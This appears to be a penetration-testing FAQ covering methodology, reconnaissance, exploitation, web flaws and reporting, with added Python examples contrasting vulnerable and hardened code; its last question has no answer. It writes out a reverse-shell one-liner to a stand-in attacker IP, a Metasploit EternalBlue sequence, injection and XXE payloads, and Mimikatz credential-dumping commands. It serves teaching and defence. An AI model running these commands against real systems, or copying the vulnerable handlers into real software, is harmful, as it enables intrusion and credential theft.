Penetration Testing Fundamentals
1. What is penetration testing?
Penetration testing (pen testing) is an authorised, simulated cyberattack performed by security professionals to identify vulnerabilities in systems, networks, and applications before malicious actors can exploit them. Unlike vulnerability scanning (automated, non-exploitative), pen testing actively attempts to exploit vulnerabilities to demonstrate real-world risk and impact. It requires explicit written authorisation (Rules of Engagement). Pen testers use the same tools and techniques as attackers but operate ethically, within defined scope, and with the goal of improving the organisation's security posture through a detailed findings report with remediation recommendations.
2. What are the different types of penetration testing?
Black box testing: the tester has no prior knowledge of the target environment — simulates an external attacker. White box testing (crystal box): the tester has full information (source code, architecture diagrams, credentials) — thorough but doesn't simulate realistic attacker conditions. Grey box testing: partial information (network diagrams, user credentials but not source code) — balances realism with depth. External penetration testing targets internet-facing assets (web apps, APIs, VPNs). Internal penetration testing simulates a compromised insider or attacker who has gained initial access. Physical penetration testing tests physical security controls (tailgating, social engineering, badge cloning).
3. What are the phases of a penetration test?
The standard penetration testing methodology follows these phases: (1) Planning and Scoping — define objectives, scope, rules of engagement, legal authorisation, and timelines; (2) Reconnaissance — gather information about the target passively (OSINT) and actively; (3) Scanning and Enumeration — identify open ports, services, versions, and vulnerabilities; (4) Exploitation — attempt to exploit identified vulnerabilities to gain access; (5) Post-Exploitation — maintain access, escalate privileges, pivot to other systems, and exfiltrate data (within scope); (6) Reporting — document findings with severity ratings, evidence, and remediation guidance; (7) Remediation Verification — retest after fixes are applied.
4. What is the PTES (Penetration Testing Execution Standard)?
PTES (Penetration Testing Execution Standard) is a framework providing detailed guidance for conducting penetration tests. It covers seven phases: Pre-Engagement Interactions (scope, authorisation, rules of engagement), Intelligence Gathering (OSINT and active reconnaissance), Threat Modelling (prioritising attack vectors), Vulnerability Analysis (identifying vulnerabilities), Exploitation (attacking identified vulnerabilities), Post-Exploitation (maintaining access, pivoting, data exfiltration within scope), and Reporting. PTES provides technical guidelines for each phase, making it the most commonly referenced methodology alongside OWASP Testing Guide for web applications and OSSTMM for comprehensive security testing.
5. What is the difference between vulnerability assessment and penetration testing?
A vulnerability assessment is an automated or semi-automated process that identifies and lists known vulnerabilities in systems using scanning tools (Nessus, Qualys, OpenVAS). It does not attempt to exploit vulnerabilities — it produces a list of potential weaknesses with severity ratings (CVSS scores). A penetration test goes further: it manually exploits vulnerabilities to demonstrate real-world impact, chains multiple vulnerabilities together (e.g., low-severity XSS + CSRF → account takeover), and tests detective and preventive controls. Vulnerability assessments are faster and cheaper; penetration tests provide evidence of actual risk. Both are complementary — vulnerability assessments are often run more frequently.
6. What is the OWASP Top 10?
The OWASP Top 10 is a regularly updated list of the ten most critical web application security risks, maintained by the Open Web Application Security Project. The 2021 edition includes: Broken Access Control, Cryptographic Failures, Injection (SQL, NoSQL, OS commands), Insecure Design, Security Misconfiguration, Vulnerable and Outdated Components, Identification and Authentication Failures, Software and Data Integrity Failures, Security Logging and Monitoring Failures, and Server-Side Request Forgery (SSRF). The OWASP Top 10 is the starting checklist for every web application penetration test and the foundation of secure development training.
7. What is CVSS and how is it used?
CVSS (Common Vulnerability Scoring System) is a standardised framework for rating the severity of security vulnerabilities on a scale from 0.0 to 10.0. CVSS v3.1 considers: Base Score (inherent severity — attack vector, complexity, privileges required, user interaction, impact on CIA), Temporal Score (exploitability over time — exploit code availability, patch status), and Environmental Score (impact specific to the organisation's context). Severity levels: Critical (9.0-10.0), High (7.0-8.9), Medium (4.0-6.9), Low (0.1-3.9). Pen test reports use CVSS scores to prioritise remediation. The NVD (National Vulnerability Database) provides CVSS scores for publicly known CVEs.
8. What is a CVE?
A CVE (Common Vulnerabilities and Exposures) is a unique identifier for a publicly known security vulnerability in a specific software product or version. CVEs are assigned by CVE Numbering Authorities (CNAs) and published in the NVD. Format: CVE-YEAR-NUMBER (e.g., CVE-2021-44228, the Log4Shell vulnerability). Each CVE entry includes a description, affected versions, CVSS score, and references. Pen testers use CVE databases to find known exploits for identified software versions during vulnerability analysis. Tools like Metasploit and Exploit-DB are indexed by CVE. Organisations track their exposure to CVEs through vulnerability management programs.
9. What is the difference between active and passive reconnaissance?
Passive reconnaissance gathers information about the target without directly interacting with its systems, avoiding detection. Techniques include: WHOIS lookups (registrar information), DNS record lookups, Google dorking (Google search operators to find exposed files and data), Shodan (internet-connected device search), LinkedIn and social media profiling, Wayback Machine (historical website content), certificate transparency logs (subdomains), and job postings (technology stack clues). Active reconnaissance directly interacts with the target: port scanning, service detection, banner grabbing, DNS zone transfers, and web spidering. Active reconnaissance is more detectable and requires explicit authorisation.
10. What are the rules of engagement in a penetration test?
Rules of Engagement (RoE) are the contractual and operational boundaries agreed between the pen tester and the client before testing begins. They define: the scope (specific IP ranges, domains, applications — what is in and out of scope), testing windows (hours when testing can occur to avoid disrupting production), prohibited techniques (DoS attacks, social engineering unless explicitly authorised, modification of production data), emergency contacts (who to call if a critical vulnerability or active threat is discovered), data handling (how sensitive data discovered must be handled), and deliverables (report format, timeline). Testing outside the agreed scope is illegal regardless of authorisation for other systems.
Reconnaissance & Enumeration
11. What is OSINT and what tools are used?
OSINT (Open Source Intelligence) is the collection of publicly available information to understand a target before active testing. Pen testers use OSINT to map the attack surface, find employee names and email formats (for phishing), identify technology stack, discover subdomains, and find exposed credentials or sensitive data. Key tools: theHarvester (emails, subdomains, names from search engines), Maltego (visual link analysis and data aggregation), Shodan (internet-connected device search), WHOIS and nslookup (domain registration and DNS), Recon-ng (web reconnaissance framework), LinkedIn/Twitter for employee profiling, and OSINT Framework (directory of OSINT tools by category). Subdomain enumeration tools: Subfinder, Amass.
12. What is Nmap and what are its key scanning techniques?
Nmap (Network Mapper) is the de facto standard for port scanning, service detection, and OS fingerprinting. Key scan types: SYN scan (-sS) — sends SYN, receives SYN-ACK (open) or RST (closed), fast and stealthy (half-open, doesn't complete the TCP handshake). TCP connect scan (-sT) — completes the three-way handshake, so it is logged by the target. UDP scan (-sU) — slower and less reliable, but needed for UDP services. Service version detection (-sV) — probes open ports to identify running services and versions. OS detection (-O). Script scanning (-sC) — runs default NSE (Nmap Scripting Engine) scripts. A full port scan: nmap -sS -p- -T4 -sV -O target.
13. What is enumeration and what information is gathered?
Enumeration is active extraction of detailed information from discovered services after port scanning. Targets include: users (valid usernames for brute force, password spray), groups and permissions, network shares (SMB enumeration), running services and versions, routing information, domain controllers and Active Directory structure (LDAP enumeration), email addresses, DNS records (zone transfers), web application directories and files (directory busting), and SNMP information. Tools: enum4linux/enum4linux-ng (Windows/Samba), nmblookup (NetBIOS), ldapsearch (LDAP/AD), snmpwalk (SNMP), gobuster/feroxbuster (web directories), wfuzz (web parameters). Thorough enumeration directly informs which exploits to attempt.
14. What is directory busting?
Directory busting (directory brute-forcing) discovers hidden or unlinked web directories and files by making HTTP requests for a large wordlist of common paths. URLs returning 200 OK, 301 Moved, or 403 Forbidden indicate existing resources. Tools: gobuster (gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt), feroxbuster (recursive, async), ffuf, dirsearch, and Burp Suite's content discovery. Common wordlists: SecLists (danielmiessler/SecLists), dirb's common.txt. Directory busting discovers admin panels, backup files, configuration files, API endpoints, and developer test pages — common sources of critical vulnerabilities.
15. What is DNS enumeration?
DNS enumeration extracts information about a target's domain infrastructure. Techniques include: nslookup/dig for A, MX, NS, TXT, and CNAME records; zone transfer attempts (dig axfr @dns-server domain.com) — if misconfigured, reveals all DNS records; subdomain enumeration using wordlists (Sublist3r, Amass, Subfinder) or certificate transparency logs (crt.sh); reverse DNS lookups (PTR records revealing server names); SPF, DKIM, DMARC record analysis (email security configuration); and DNS brute forcing. Subdomains reveal internal infrastructure (dev.company.com, vpn.company.com, jira.company.com), forgotten systems, and attack surface. DNS information is critical for mapping the full scope of internet-facing assets.
Exploitation Techniques
16. What is Metasploit?
Metasploit is the world's most widely used penetration testing framework, providing a modular platform for developing, testing, and executing exploits. Components: msfconsole (interactive CLI), exploits (attack code targeting specific vulnerabilities), payloads (code that runs after exploitation — Meterpreter, shell), auxiliary modules (scanners, fuzzers, DoS), and post-exploitation modules. Workflow: search ms17-010 → use exploit/windows/smb/ms17_010_eternalblue → set RHOSTS 192.168.1.1 → set PAYLOAD windows/x64/meterpreter/reverse_tcp → run. Meterpreter provides an advanced interactive shell with commands for privilege escalation, credential dumping, lateral movement, and pivoting. Metasploit requires explicit authorisation.
17. What is SQL injection and how do you test for it?
SQL injection exploits applications that include unsanitised user input in SQL queries. Test manually by injecting single quote ' to see if the application returns a database error. Boolean-based: ' OR '1'='1 tests if the application behaves differently. Time-based: ' OR SLEEP(5)-- confirms injection if the response is delayed. SQLmap automates SQL injection detection and exploitation: sqlmap -u "http://target/page?id=1" --dbs enumerates databases. SQLmap can extract tables, dump data, access the file system, and execute OS commands depending on database permissions. Blind SQL injection (no error messages) uses boolean conditions and time delays to extract data bit by bit.
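As an added example (not the page's own code), the two manual probes above run against a constructed in-memory SQLite table, once through a query built by string concatenation and once through a parameterised query. The contrast is the entire fix: the bound value is never parsed as SQL.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for an application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Concatenates user input into the statement, so the input becomes SQL."""
    sql = "SELECT id, username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised query: the driver binds the value; quotes in it are just data."""
    return conn.execute(
        "SELECT id, username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def probe(conn: sqlite3.Connection, lookup, payload: str) -> str:
    """Classify the application's response the way the manual test in the text does:
    a database error, or a row count that differs from what a literal username should give."""
    try:
        rows = lookup(conn, payload)
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"
    return f"{len(rows)} row(s)"


if __name__ == "__main__":
    db = make_db()
    for payload in ("alice", "'", "' OR '1'='1"):
        print(f"{payload!r:16} vulnerable: {probe(db, lookup_vulnerable, payload):32} "
              f"safe: {probe(db, lookup_safe, payload)}")
```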
18. What is Cross-Site Scripting (XSS) and how is it exploited?
XSS injects malicious JavaScript into web pages viewed by other users. Reflected XSS: the payload is in the URL and reflected in the response — test by injecting <script>alert(1)</script> in URL parameters or form fields. Stored XSS: the payload is stored in the database and executed whenever the page is loaded by any user — test comment fields, user profiles, and any persistent input. DOM-based XSS: payload is processed by client-side JavaScript — test URL fragments and JavaScript sink manipulation. Exploitation: cookie theft (document.cookie exfiltration), session hijacking, keylogging, credential phishing, and CSRF execution. Tools: Burp Suite Scanner, XSStrike, XSSHunter (for blind XSS).
19. What is Burp Suite and how is it used in web app pen testing?
Burp Suite is the industry-standard web application security testing platform. The Proxy intercepts HTTP/HTTPS traffic between the browser and server, allowing inspection and modification of every request and response. The Repeater manually resends modified requests for manual testing. Intruder automates request fuzzing (brute force, parameter tampering, injection testing) with customisable payload positions and wordlists. Scanner (Pro) automatically crawls and audits for OWASP vulnerabilities. The Decoder handles encoding/decoding (Base64, URL, HTML). The Collaborator detects out-of-band interactions (blind SSRF, XXE, blind SQL injection). Extensions (BApp Store): ActiveScan++, Autorize, JSON Beautifier.
20. What is a reverse shell and how does it work?
A reverse shell establishes a command-line connection from the target machine back to the attacker's machine, bypassing firewall rules that block inbound connections. The attacker starts a listener: nc -lvnp 4444. The attacker delivers a payload to the target (via web shell, exploit, phishing) that executes: bash -i >& /dev/tcp/attacker-ip/4444 0>&1. The target connects out to the attacker, providing interactive shell access. Reverse shells bypass NAT and most perimeter firewalls (which allow outbound traffic). A bind shell (less common) opens a port on the target that the attacker connects to — useful on hosts where outbound connections are filtered. Tools: netcat, socat, msfvenom payloads.
21. What is privilege escalation?
Privilege escalation is the process of gaining higher privileges after initial access to a system — moving from a low-privilege user to SYSTEM/root. Vertical escalation (the most common target) moves from standard user to administrator. Techniques on Linux: SUID/SGID binary exploitation (finding setuid binaries that can be abused), sudo misconfiguration (sudo -l reveals commands executable without password), cron jobs running as root with writable scripts, writable /etc/passwd, kernel exploits, PATH hijacking, and capabilities abuse. Techniques on Windows: unquoted service paths, weak service permissions, DLL hijacking, token impersonation (SeImpersonatePrivilege via Juicy/Sweet Potato), AlwaysInstallElevated, and UAC bypass.
22. What is lateral movement?
Lateral movement is the technique of progressively accessing additional systems within a network after gaining initial footing, building toward the target (domain controller, sensitive data). Techniques include: Pass-the-Hash (using captured NTLM hashes with pth-winexe or Mimikatz's sekurlsa module), Pass-the-Ticket (using stolen Kerberos tickets with Mimikatz's kerberos::ptt), remote execution via SMB (PsExec, wmiexec), PowerShell remoting, RDP with stolen credentials, using legitimate admin tools (Living off the Land), and exploiting trust relationships between systems. Tools: Impacket (Python suite for SMB/Kerberos attacks), CrackMapExec, BloodHound (maps Active Directory attack paths).
23. What is Mimikatz?
Mimikatz is a Windows credential extraction tool that can dump password hashes, plaintext credentials (from LSASS memory), Kerberos tickets, DPAPI secrets, and more. Commands: sekurlsa::logonpasswords dumps credentials from LSASS (requires SYSTEM or SeDebugPrivilege); lsadump::sam dumps the SAM database; kerberos::list lists Kerberos tickets; kerberos::golden creates a Golden Ticket (long-term domain persistence using the KRBTGT hash); sekurlsa::pth performs Pass-the-Hash attacks. Modern Windows defences (Credential Guard, Protected Users group) mitigate Mimikatz. It is used in red team engagements after administrative access is achieved and is a primary reason why least privilege and Credential Guard are critical defences.
24. What are Active Directory attack techniques?
Active Directory (AD) attacks exploit the Windows domain controller authentication infrastructure. Key attacks: Kerberoasting — request service tickets (TGS) for SPN-registered accounts and crack them offline (hashcat, john) to extract service account passwords; AS-REP Roasting — exploit accounts with "Do not require Kerberos preauthentication" set; BloodHound/SharpHound — enumerate AD permissions and visualise attack paths to Domain Admin; DCSync — accounts with Replication Directory Changes permissions can dump all domain hashes without executing code on the DC; Pass-the-Hash/Pass-the-Ticket — reuse credentials without knowing plaintext; Golden Ticket — forge Kerberos tickets using the KRBTGT hash for persistent access.
25. What is pivoting and tunnelling?
Pivoting uses a compromised system as a stepping stone to access otherwise unreachable network segments. The compromised host acts as a proxy for the attacker. Techniques: SSH tunnelling (ssh -L local_port:internal_host:remote_port pivot_user@pivot_host), SOCKS proxy via Metasploit (use auxiliary/server/socks_proxy; route add ...), Chisel (fast TCP/UDP tunnelling over HTTP), and Ligolo-ng (reverse TUN tunnel). Tunnelling routes attacker traffic through legitimate protocols (DNS tunnelling via iodine, ICMP tunnelling via ptunnel) to bypass firewall rules. Pivoting enables testing of internal networks from an external foothold, as would occur in a real-world breach after initial compromise.
Web Application Testing
26. What is SSRF (Server-Side Request Forgery)?
SSRF tricks a server-side application into making HTTP requests to unintended destinations, including internal services (localhost, internal IPs) not accessible from the internet. Attackers can: access internal metadata APIs (AWS metadata at 169.254.169.254 — read IAM credentials), scan internal networks, access internal services (Redis, Elasticsearch, internal admin panels), and bypass access controls. Test by providing a server-side URL parameter pointing to a controlled server (Burp Collaborator) or internal addresses. Blind SSRF uses out-of-band detection. Mitigations: whitelist allowed URLs, disable unnecessary URL schemes (file://, gopher://), use cloud IMDS v2 (requiring PUT request), and implement network egress controls.
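As an added example (not the page's own code), a Python vetting function for the "whitelist allowed URLs / disable unnecessary schemes" mitigations above: it rejects non-HTTP schemes, resolves the host through an injectable resolver, and refuses any answer in loopback, link-local (the 169.254.169.254 metadata range), private or other non-routable space, including IPv4-mapped IPv6 forms. The stub DNS table is constructed so the example runs offline; `system_resolve` uses the real resolver.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file://, gopher://, dict:// and friends never pass


def system_resolve(host: str) -> list:
    """Real DNS lookup; vet_outbound_url accepts any callable with this shape."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def blocked_reason(addr) -> str:
    """Empty string when the address is publicly routable, otherwise why it is blocked."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # judge ::ffff:169.254.169.254 as its IPv4 form
    if addr.is_loopback:
        return "loopback"
    if addr.is_link_local:
        return "link-local (cloud metadata range)"
    if addr.is_private:
        return "private range"
    if addr.is_multicast or addr.is_reserved or addr.is_unspecified:
        return "non-routable"
    return ""


def vet_outbound_url(url: str,
                     resolve: Callable[[str], Iterable[str]] = system_resolve) -> Tuple[bool, str]:
    """Decide whether the server may fetch `url` on behalf of a user.
    Caveat: connect to the vetted IP afterwards (pin it); re-resolving the name
    at connect time reopens the hole via DNS rebinding."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL not allowed"  # avoids host@other confusion
    try:
        addrs = [ipaddress.ip_address(host)]  # IP literal, including bracketed IPv6
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError):
            return False, f"{host} does not resolve"  # fail closed
    if not addrs:
        return False, f"{host} does not resolve"
    for addr in addrs:
        reason = blocked_reason(addr)
        if reason:
            return False, f"{host} -> {addr} is {reason}"
    return True, f"ok: {host} -> {', '.join(map(str, addrs))}"


# Constructed DNS answers so the example runs without network access.
STUB_DNS = {
    "localhost": ["127.0.0.1"],
    "metadata.internal": ["169.254.169.254"],
    "intranet.corp.example": ["10.0.0.5"],
    "api.partner.example": ["93.184.216.34"],
}


def stub_resolve(host: str) -> list:
    try:
        return STUB_DNS[host.lower()]
    except KeyError:
        raise OSError(f"NXDOMAIN {host}")


if __name__ == "__main__":
    for candidate in ("https://api.partner.example/v1/report",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://metadata.internal/",
                      "file:///etc/passwd",
                      "http://[::ffff:127.0.0.1]/"):
        print(vet_outbound_url(candidate, stub_resolve), candidate)
```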
27. What is XML External Entity (XXE) injection?
XXE exploits applications that parse XML input with external entity processing enabled. An attacker defines an external entity that points to a sensitive file: <!ENTITY xxe SYSTEM "file:///etc/passwd"> and includes it in the XML payload. If the parser processes external entities, it reads the file and includes it in the response. XXE can read arbitrary files, perform SSRF (fetching internal URLs), cause DoS (Billion Laughs attack), and in some cases achieve RCE. Test by injecting external entity definitions in XML-accepting inputs. Mitigations: disable external entity processing in the XML parser (set FEATURE_EXTERNAL_GENERAL_ENTITIES to false), use less complex formats (JSON), and validate and sanitise XML input.
28. What is IDOR (Insecure Direct Object Reference)?
IDOR (now classified under Broken Access Control in OWASP Top 10) occurs when an application uses user-controllable input to directly access objects (database records, files, user data) without sufficient authorisation checks. Test by: changing URL parameters (/account?id=1234 → id=1235), modifying request body IDs, altering encoded values (Base64, hashed IDs), and testing all CRUD operations. Horizontal IDOR accesses other users' data at the same privilege level; vertical IDOR accesses functions requiring higher privilege. Mitigation: implement proper authorisation checks for every object access, use indirect references (GUIDs instead of sequential integers), and validate that the authenticated user is authorised to access the requested object.
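As an added example (not the page's own code), the vulnerable handler beside its hardened form in Python, with a constructed in-memory account table: the first only checks that the caller is logged in, the second authorises every object access and answers "not found" and "not yours" identically so the id space cannot be enumerated; `ReferenceMap` is the indirect-reference mitigation (random per-session handles instead of sequential integers).

```python
import secrets

# Constructed data standing in for the application's database.
USERS = {"alice": "user", "bob": "user", "mallory": "user", "root": "admin"}
ACCOUNTS = {
    1234: {"owner": "alice", "balance": 100},
    1235: {"owner": "bob", "balance": 250},
}


class Forbidden(Exception):
    """Raised for any object the caller may not access, whether it is missing or
    owned by someone else, so the response does not reveal which ids exist."""


def get_account_vulnerable(session_user: str, account_id: int) -> dict:
    """Checks only that the caller is authenticated, then trusts the id from the URL."""
    if session_user not in USERS:
        raise Forbidden("login required")
    return ACCOUNTS[account_id]


def get_account_safe(session_user: str, account_id: int) -> dict:
    """Authorises the specific object: owner or admin only."""
    if session_user not in USERS:
        raise Forbidden("login required")
    acct = ACCOUNTS.get(account_id)
    if acct is None or (acct["owner"] != session_user and USERS[session_user] != "admin"):
        raise Forbidden("not authorised for this object")
    return acct


def can_access(session_user: str, account_id: int) -> bool:
    """Boolean view of get_account_safe, convenient for tests and policy checks."""
    try:
        get_account_safe(session_user, account_id)
        return True
    except Forbidden:
        return False


class ReferenceMap:
    """Indirect object references: random handles replace sequential ids in URLs,
    and a handle resolves only for the session that minted it."""

    def __init__(self) -> None:
        self._handles = {}  # handle -> (session_user, account_id)

    def handle_for(self, session_user: str, account_id: int) -> str:
        handle = secrets.token_urlsafe(16)
        self._handles[handle] = (session_user, account_id)
        return handle

    def resolve(self, session_user: str, handle: str) -> int:
        entry = self._handles.get(handle)
        if entry is None or entry[0] != session_user:
            raise Forbidden("unknown reference")
        return entry[1]


def view_account(session_user: str, handle: str, refs: ReferenceMap) -> dict:
    """Request handler: resolve the indirect reference, then still authorise the object.
    Indirection hides the id space; it does not replace the ownership check."""
    return get_account_safe(session_user, refs.resolve(session_user, handle))


if __name__ == "__main__":
    print("vulnerable: mallory reads 1234 ->", get_account_vulnerable("mallory", 1234))
    print("safe: mallory may read 1234 ->", can_access("mallory", 1234))
    refs = ReferenceMap()
    h = refs.handle_for("alice", 1234)
    print("alice via handle ->", view_account("alice", h, refs))
```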
29. What is CSRF (Cross-Site Request Forgery)?
CSRF tricks authenticated users into unknowingly submitting requests to a web application they are logged into. An attacker crafts a malicious webpage with a hidden form that submits to the target application (bank transfer, password change) — when the victim visits the attacker's page, the browser sends the request with the victim's session cookies. Test by: identifying state-changing requests without CSRF tokens, checking if CSRF tokens are validated, testing same-site cookie attributes. Mitigations: CSRF tokens (unique, unpredictable per-session tokens validated server-side), SameSite=Strict/Lax cookie attribute (most effective modern mitigation), double submit cookie pattern, and custom request headers for AJAX.
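As an added example (not the page's own code), the synchroniser-token mitigation in Python: a random nonce bound to the session with an HMAC, validated in constant time before a state-changing action runs, alongside the SameSite cookie attribute. The request objects and server secret are constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Constructed server secret; a real deployment loads it from configuration, not code.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Synchroniser token: random nonce plus an HMAC that binds it to this session,
    so a token captured from one session is useless in another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_valid(session_id: str, token: Optional[str]) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def session_cookie(session_id: str) -> str:
    """Set-Cookie value: SameSite stops the browser attaching the cookie to cross-site POSTs,
    Secure/HttpOnly keep it off the wire in clear and out of reach of script."""
    return f"session={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


def handle_transfer(request: dict) -> Tuple[int, str]:
    """State-changing endpoint. `request` is a constructed dict with 'cookies' and 'form'."""
    session_id = request.get("cookies", {}).get("session")
    if not session_id:
        return 401, "login required"
    # A forged cross-site form post arrives with the victim's cookie but cannot
    # contain a valid token, so it is refused before any state changes.
    if not csrf_token_valid(session_id, request.get("form", {}).get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    form = request["form"]
    return 200, f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid = "sess-alice"
    token = issue_csrf_token(sid)
    forged = {"cookies": {"session": sid}, "form": {"to": "mallory", "amount": "1000"}}
    legit = {"cookies": {"session": sid},
             "form": {"to": "bob", "amount": "10", "csrf_token": token}}
    print("forged request:", handle_transfer(forged))
    print("legit request: ", handle_transfer(legit))
    print(session_cookie(sid))
```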
30. What is authentication testing?
Authentication testing evaluates the strength of login mechanisms. Tests include: username enumeration (does the application reveal whether a username exists via different error messages?), password policy enforcement, brute force protection (rate limiting, account lockout, CAPTCHA), default credentials (admin/admin, admin/password), credential stuffing (testing known breached credential lists), multi-factor authentication bypass (SIM swapping, OTP reuse, backup code exposure), password reset flaws (predictable tokens, token reuse, host header injection in reset emails), and session management (session fixation, predictable session IDs, missing Secure/HttpOnly cookie flags). Tools: Hydra, Medusa, Burp Suite Intruder.
Post-Exploitation & Reporting
31. What is persistence in post-exploitation?
Persistence mechanisms maintain access to a compromised system across reboots and user logouts. Windows techniques: adding registry run keys (HKCU/HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run), scheduled tasks, Windows services, startup folder, DLL hijacking, WMI event subscriptions, and Active Directory backdoors (skeleton key, Golden Ticket). Linux techniques: cron jobs, ~/.bashrc modification, SSH authorized_keys, setuid binary planting, init scripts, and systemd service units. Persistence is demonstrated during red team engagements to show the full impact of a compromise. In pen tests, actual persistence is typically not installed on production systems to avoid unintended consequences — it is documented as a demonstrated capability.
32. What is data exfiltration?
Data exfiltration demonstrates the attacker's ability to extract sensitive data from a compromised environment, completing the "kill chain." Techniques: HTTPS upload to attacker-controlled server, DNS exfiltration (encode data in DNS queries to a controlled nameserver — evades many data loss prevention systems), email (SMTP using compromised mail server), cloud storage uploads (S3, Dropbox, Google Drive), and covert channels (ICMP tunnelling, steganography). In pen tests, actual sensitive data is not exfiltrated — testers create synthetic "flag" files to demonstrate the capability without handling real data. The exfiltration path is documented in the report to highlight inadequate DLP and egress monitoring controls.
33. What is a red team engagement vs. a penetration test?
A penetration test is typically scoped, time-limited, and focused on finding as many vulnerabilities as possible in a defined target. The client's security team usually knows testing is occurring. A red team engagement simulates a full, realistic adversary campaign with a specific objective (e.g., access the finance database, steal CEO credentials). The blue team (defenders) does not know the engagement is happening — this tests detection and response capabilities, not just vulnerability existence. Red teams use OPSEC (operational security) to avoid detection, operate over weeks or months, use custom tools to evade EDR, and test the full kill chain from initial access to objective completion. Red team results measure organisational security maturity.
34. What are the components of a penetration test report?
A professional pen test report includes: Executive Summary (high-level overview of scope, methodology, key findings, and risk posture — written for non-technical senior management), Technical Findings (each vulnerability with: title, severity rating (CVSS score), affected systems, description, evidence (screenshots, logs, proof-of-concept code), risk and business impact, and specific remediation guidance), Methodology (testing approach, tools used, phases covered), Scope (what was tested and excluded), Attack Narrative (story of how the tester progressed through the kill chain — for red team engagements), and Appendices (raw scan output, tool versions, CVE references). Reports must be clear, evidence-backed, and actionable.
35. What is a proof of concept (PoC) in a pen test report?
A proof of concept (PoC) is evidence demonstrating that a vulnerability was successfully exploited, not just theoretically present. PoC elements include: screenshots showing exploitation (shell access, data retrieved, admin panel accessed), the exact command or request used (reproducible), the impact demonstrated (what was accessed), and where appropriate, a minimal code snippet showing the exploit. PoCs distinguish confirmed findings from speculative ones and give developers the exact information needed to reproduce and understand the vulnerability. Sensitive details (actual passwords, personal data) are redacted from PoCs. In critical severity findings, PoCs often show the complete exploit chain.
36. What is the OWASP Testing Guide?
The OWASP Testing Guide (OTG) is the most comprehensive methodology for web application penetration testing. Its latest version (v4.2) covers: Information Gathering (OTG-INFO), Configuration and Deployment Management Testing (OTG-CONFIG), Identity Management Testing (OTG-IDENT), Authentication Testing (OTG-AUTHN), Authorisation Testing (OTG-AUTHZ), Session Management Testing (OTG-SESS), Input Validation Testing (OTG-INPVAL), Error Handling, Cryptography Testing, Business Logic Testing, and Client-Side Testing. Each test case includes objectives, methodology, tools, and examples. The OWASP Testing Guide is the standard reference document that web application pen testers use to ensure comprehensive coverage.
37. What is subdomain takeover?
Subdomain takeover occurs when a subdomain (e.g., shop.company.com) is configured as a CNAME pointing to a third-party service (e.g., AWS S3, GitHub Pages, Heroku) that has been deprovisioned — the CNAME still exists but the target service is no longer claimed. An attacker registers the deprovisioned resource, gaining control of the subdomain. Impact: serve malicious content under the trusted domain, steal cookies set on the parent domain, phishing attacks from a legitimate-looking URL, and bypassing CSP. Test using: Subfinder (enumerate subdomains) + dig (check CNAME targets) + can-i-take-over-xyz (list of vulnerable services). Mitigation: remove stale DNS records immediately when deprovisioning services.
38. What is fuzzing in penetration testing?
Fuzzing (fuzz testing) sends malformed, unexpected, or random input to an application to discover bugs, crashes, and security vulnerabilities. In web app testing: Burp Suite Intruder or ffuf fuzzes HTTP parameters, headers, and body fields with wordlists to find injection points, hidden parameters, and input validation flaws. API fuzzing sends invalid types, boundary values, and special characters to API endpoints. Protocol fuzzing sends malformed packets to network services to discover memory corruption vulnerabilities. AFL (American Fuzzy Lop) and libFuzzer are coverage-guided fuzzers for binary applications. Fuzzing discovers vulnerabilities that manual testing and automated scanners miss, particularly in custom or proprietary software.
39. What is business logic testing?
Business logic testing identifies flaws in the application's intended workflow that allow unintended actions — vulnerabilities that scanners cannot detect because the requests appear valid. Examples: negative quantity in a purchase (credits money), skipping payment steps in a checkout flow, purchasing items at 0 price (price tampering in JavaScript), reusing gift cards or discount codes, bypassing rate limits by manipulating the request format, account enumeration through differential responses, and privilege escalation through parameter manipulation. Business logic flaws require understanding the intended application behaviour and testing deviations. They are often the most impactful findings in web app pen tests and require experienced testers who think like both users and attackers.
40. What is API penetration testing?
